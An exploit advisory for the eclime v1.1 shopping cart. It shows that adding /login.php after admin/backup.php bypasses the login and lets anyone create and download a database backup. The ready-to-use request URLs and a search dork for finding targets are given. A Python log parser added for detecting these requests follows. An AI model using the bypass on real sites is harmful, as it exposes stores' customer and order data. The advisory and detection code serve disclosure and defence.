========================================================================================
| # Title : eclime v1.1 => Bypass / Create and Download Backup Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iqs3cur1ty.com/vb
| # Dork : Powered by eclime.com
| # Tested on: Windows SP2 Français V.(Pnx2 2.0)
| # Bug : Backup
====================== Exploit By indoushka =================================
# Exploit :
------------------------------------------
eclime v1.1 (March 2010)
------------------------------------------
eclime is a free open-source Smarty-based shopping cart
built on the solid osCommerce 2.2 engine, with many useful
contributions added.

------------------------------------------

http://127.0.0.1/eclime/admin/backup.php/login.php?action=backup

http://127.0.0.1/eclime/admin/backup.php/login.php?action=backupnow

To download the backup: http://127.0.0.1/eclime/admin/backup.php/login.php?action=download&file=db_comm-20100301222138.sql

Change db_comm-20100301222138.sql to the name of the backup. You can't download it with IE; I downloaded it with Opera 10.10 + Mozilla Firefox.
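
Added example (not part of the original advisory): a log check for the request shape shown above, an admin script followed by an extra path segment such as /login.php. The Apache combined log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qs

# Apache combined log format is assumed: ip ... "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\d+|-)')
# A script directly under admin/ followed by extra path segments,
# e.g. /admin/backup.php/login.php
PATHINFO_RE = re.compile(r'/admin/(?P<script>[^/]+\.php)/(?P<extra>.+)$', re.I)
BACKUP_ACTIONS = {"backup", "backupnow", "download"}  # actions named in the advisory

def find_pathinfo_requests(lines):
    """Return one dict per request that hits an admin script with trailing path info."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        parts = urlsplit(m["target"])
        path = unquote(parts.path)  # also catches %2F-encoded separators
        p = PATHINFO_RE.search(path)
        if not p:
            continue
        action = parse_qs(parts.query).get("action", [""])[0].lower()
        status = int(m["status"])
        script = p["script"].lower()
        hits.append({
            "ip": m["ip"], "script": script, "extra": p["extra"],
            "action": action, "status": status,
            # 200 on a backup action means the server answered instead of
            # redirecting to the login page
            "backup_served": script == "backup.php" and status == 200
                             and action in BACKUP_ACTIONS,
        })
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Mar/2010:22:21:38 +0000] "GET /eclime/admin/backup.php/login.php?action=backupnow HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Mar/2010:22:22:01 +0000] "GET /eclime/admin/backup.php/login.php?action=download&file=db_comm-20100301222138.sql HTTP/1.1" 200 84211',
    '198.51.100.4 - - [01/Mar/2010:22:30:00 +0000] "GET /eclime/admin/backup.php?action=backup HTTP/1.1" 302 -',
    '198.51.100.9 - - [01/Mar/2010:22:31:00 +0000] "GET /eclime/admin/orders.php%2Flogin.php HTTP/1.1" 302 -',
    '198.51.100.4 - - [01/Mar/2010:22:32:00 +0000] "GET /eclime/admin/login.php HTTP/1.1" 200 2310',
]

if __name__ == "__main__":
    for hit in find_pathinfo_requests(SAMPLE_LOG):
        print(hit)
```

Any hit with backup_served set is a database dump that left the server and should be handled as a data exposure; the other hits are probes worth correlating by source IP.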

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friends :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.ne